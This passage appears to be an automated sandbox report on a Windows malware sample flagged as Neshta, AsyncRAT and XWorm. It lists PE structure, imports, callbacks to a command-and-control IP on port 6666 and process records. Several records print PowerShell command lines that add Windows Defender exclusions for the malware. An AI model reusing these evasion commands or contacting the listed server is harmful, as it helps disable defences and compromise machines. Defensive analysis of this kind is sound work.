                                      call 00007F5EA4EDD159h
                                      mov eax, 004091C4h
                                      mov ecx, 00000003h
                                      mov edx, 00000003h
                                       Name | Virtual Address | Virtual Size | Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15000 | 0x864 | .idata
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0x1400 | .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18000 | 0x5cc | .reloc
                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x17000 | 0x18 | .rdata
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x72c0 | 0x7400 | 57df3a5615ac3f00c33b7f1f6f46d36a | False | 0.6197804418103449 | data | 6.521149320889011 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9000 | 0x218 | 0x400 | 7ffc3168a7f3103634abdf3a768ed128 | False | 0.3623046875 | data | 3.1516983405583385 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xa000 | 0xa899 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x15000 | 0x864 | 0xa00 | 6e7a45521bfca94f1e506361f70e7261 | False | 0.37421875 | data | 4.173859768945439 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x16000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x17000 | 0x18 | 0x200 | 7e6c0f4f4435abc870eb550d5072bad6 | False | 0.05078125 | data | 0.2069200177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x18000 | 0x5cc | 0x600 | 2f4536f51417a33d5e7cc1d66b1ca51e | False | 0.8333333333333334 | data | 6.433117350337874 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x19000 | 0x1400 | 0x1400 | d98354d7589200e2277640f411cb007c | False | 0.5134765625 | data | 6.1058077759423535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x19150 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4264 | Russian | Russia | 0.5307223264540337
RT_RCDATA | 0x1a1f8 | 0x10 | data | | | 1.5
RT_RCDATA | 0x1a208 | 0xac | data | | | 1.063953488372093
RT_GROUP_ICON | 0x1a2b4 | 0x14 | data | Russian | Russia | 1.1
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll | GetKeyboardType, MessageBoxA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | WriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
gdi32.dll | StretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
user32.dll | ReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
shell32.dll | ShellExecuteA, ExtractIconA
Language of compilation system | Country where language is spoken
Russian | Russia
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 2, 2024 06:52:01.926125050 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Jul 2, 2024 06:52:01.931377888 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Jul 2, 2024 06:52:01.931632996 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Jul 2, 2024 06:52:01.932157040 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Jul 2, 2024 06:52:01.937026024 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Jul 2, 2024 06:52:02.407448053 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Jul 2, 2024 06:52:02.449515104 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Jul 2, 2024 06:53:13.309176922 CEST | 49705 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:13.317487955 CEST | 6666 | 49705 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:13.317569017 CEST | 49705 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:13.385483980 CEST | 49705 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:13.393064022 CEST | 6666 | 49705 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:15.485744953 CEST | 6666 | 49705 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:15.485927105 CEST | 49705 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:17.919755936 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Jul 2, 2024 06:53:17.919929981 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Jul 2, 2024 06:53:17.963959932 CEST | 49705 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:17.965264082 CEST | 49706 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:17.968801975 CEST | 6666 | 49705 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:17.970107079 CEST | 6666 | 49706 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:17.970208883 CEST | 49706 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:17.986192942 CEST | 49706 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:17.991170883 CEST | 6666 | 49706 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:20.207756042 CEST | 6666 | 49706 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:20.208240986 CEST | 49706 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:22.700336933 CEST | 49706 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:22.702291965 CEST | 49707 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:22.705257893 CEST | 6666 | 49706 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:22.707523108 CEST | 6666 | 49707 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:22.707611084 CEST | 49707 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:22.746671915 CEST | 49707 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:22.751804113 CEST | 6666 | 49707 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:24.860589981 CEST | 6666 | 49707 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:24.860672951 CEST | 49707 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:26.606139898 CEST | 49707 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:26.608102083 CEST | 49708 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:26.610897064 CEST | 6666 | 49707 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:26.612941027 CEST | 6666 | 49708 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:26.613029003 CEST | 49708 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:26.630021095 CEST | 49708 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:26.634881973 CEST | 6666 | 49708 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:28.785181046 CEST | 6666 | 49708 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:28.785253048 CEST | 49708 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:30.831809044 CEST | 49708 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:30.833518982 CEST | 49709 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:30.836713076 CEST | 6666 | 49708 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:30.838382006 CEST | 6666 | 49709 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:30.838469028 CEST | 49709 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:30.855678082 CEST | 49709 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:30.860506058 CEST | 6666 | 49709 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:33.021987915 CEST | 6666 | 49709 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:33.022237062 CEST | 49709 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:35.824935913 CEST | 49709 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:35.825973988 CEST | 49710 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:35.829858065 CEST | 6666 | 49709 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:35.830784082 CEST | 6666 | 49710 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:35.830863953 CEST | 49710 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:35.846719027 CEST | 49710 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:35.851726055 CEST | 6666 | 49710 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:38.027363062 CEST | 6666 | 49710 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:38.027504921 CEST | 49710 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:40.840540886 CEST | 49710 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:40.841665983 CEST | 49711 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:40.846113920 CEST | 6666 | 49710 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:40.846682072 CEST | 6666 | 49711 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:40.846765041 CEST | 49711 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:40.862129927 CEST | 49711 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:40.866895914 CEST | 6666 | 49711 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:42.420320988 CEST | 49699 | 80 | 192.168.2.7 | 208.95.112.1
Jul 2, 2024 06:53:42.425198078 CEST | 80 | 49699 | 208.95.112.1 | 192.168.2.7
Jul 2, 2024 06:53:43.020768881 CEST | 6666 | 49711 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:43.020872116 CEST | 49711 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:44.903222084 CEST | 49711 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:44.904297113 CEST | 49712 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:44.908219099 CEST | 6666 | 49711 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:44.909430981 CEST | 6666 | 49712 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:44.909511089 CEST | 49712 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:44.923976898 CEST | 49712 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:44.929363012 CEST | 6666 | 49712 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:47.126477957 CEST | 6666 | 49712 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:47.126633883 CEST | 49712 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:48.747612953 CEST | 49713 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:48.747613907 CEST | 49712 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:48.752440929 CEST | 6666 | 49712 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:48.752451897 CEST | 6666 | 49713 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:48.752531052 CEST | 49713 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:48.766283989 CEST | 49713 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:48.771389961 CEST | 6666 | 49713 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:50.991977930 CEST | 6666 | 49713 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:50.992072105 CEST | 49713 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:52.262334108 CEST | 49713 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:52.264245987 CEST | 49714 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:52.267189980 CEST | 6666 | 49713 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:52.269148111 CEST | 6666 | 49714 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:52.269234896 CEST | 49714 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:52.293417931 CEST | 49714 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:52.298433065 CEST | 6666 | 49714 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:54.442775965 CEST | 6666 | 49714 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:54.442857027 CEST | 49714 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:55.153315067 CEST | 49714 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:55.154129982 CEST | 49715 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:55.158092976 CEST | 6666 | 49714 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:55.158885956 CEST | 6666 | 49715 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:55.158971071 CEST | 49715 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:55.173754930 CEST | 49715 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:55.178596973 CEST | 6666 | 49715 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:57.313405991 CEST | 6666 | 49715 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:57.313839912 CEST | 49715 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:57.481360912 CEST | 49715 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:57.482135057 CEST | 49716 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:57.486170053 CEST | 6666 | 49715 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:57.486906052 CEST | 6666 | 49716 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:57.486988068 CEST | 49716 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:57.501473904 CEST | 49716 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:53:57.506270885 CEST | 6666 | 49716 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:59.709695101 CEST | 6666 | 49716 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:53:59.709899902 CEST | 49716 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:54:00.205476999 CEST | 49716 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:54:00.207221031 CEST | 49717 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:54:00.210448980 CEST | 6666 | 49716 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:54:00.212050915 CEST | 6666 | 49717 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:54:00.212240934 CEST | 49717 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:54:00.232928038 CEST | 49717 | 6666 | 192.168.2.7 | 45.141.26.232
Jul 2, 2024 06:54:00.237854004 CEST | 6666 | 49717 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:54:02.379858971 CEST | 6666 | 49717 | 45.141.26.232 | 192.168.2.7
Jul 2, 2024 06:54:02.379961967 CEST | 49717 | 6666 | 192.168.2.7 | 45.141.26.232
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 2, 2024 06:52:01.910375118 CEST | 64948 | 53 | 192.168.2.7 | 1.1.1.1
Jul 2, 2024 06:52:01.917416096 CEST | 53 | 64948 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 2, 2024 06:52:01.910375118 CEST | 192.168.2.7 | 1.1.1.1 | 0x61d8 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 2, 2024 06:52:01.917416096 CEST | 1.1.1.1 | 192.168.2.7 | 0x61d8 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                      • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | 5336 | C:\Users\user\AppData\Local\Temp\3582-490\x.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 06:52:01.932157040 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jul 2, 2024 06:52:02.407448053 CEST | 175 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 02 Jul 2024 04:52:01 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 16
                                      X-Rl: 42
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false

                                      Target ID:0
                                      Start time:00:51:56
                                      Start date:02/07/2024
                                      Path:C:\Users\user\Desktop\x.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\x.exe"
                                      Imagebase:0x400000
                                      File size:88'064 bytes
                                      MD5 hash:D27E7C560C09EB318C80CAB58BAEA1B2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:00:51:57
                                      Start date:02/07/2024
                                      Path:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe"
                                      Imagebase:0xdc0000
                                      File size:46'592 bytes
                                      MD5 hash:9F4FFCEB9E7905107492815B7EBFDC13
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: ditekSHen
                                      Reputation:low
                                      Has exited:false

                                      Target ID:3
                                      Start time:00:52:02
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:4
                                      Start time:00:52:02
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                                      Imagebase:0xc40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:00:52:02
                                      Start date:02/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:18
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:19
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                                      Imagebase:0xc40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:20
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:21
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:22
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                                      Imagebase:0xc40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:23
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:24
                                      Start time:01:56:39
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:25
                                      Start time:01:56:39
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
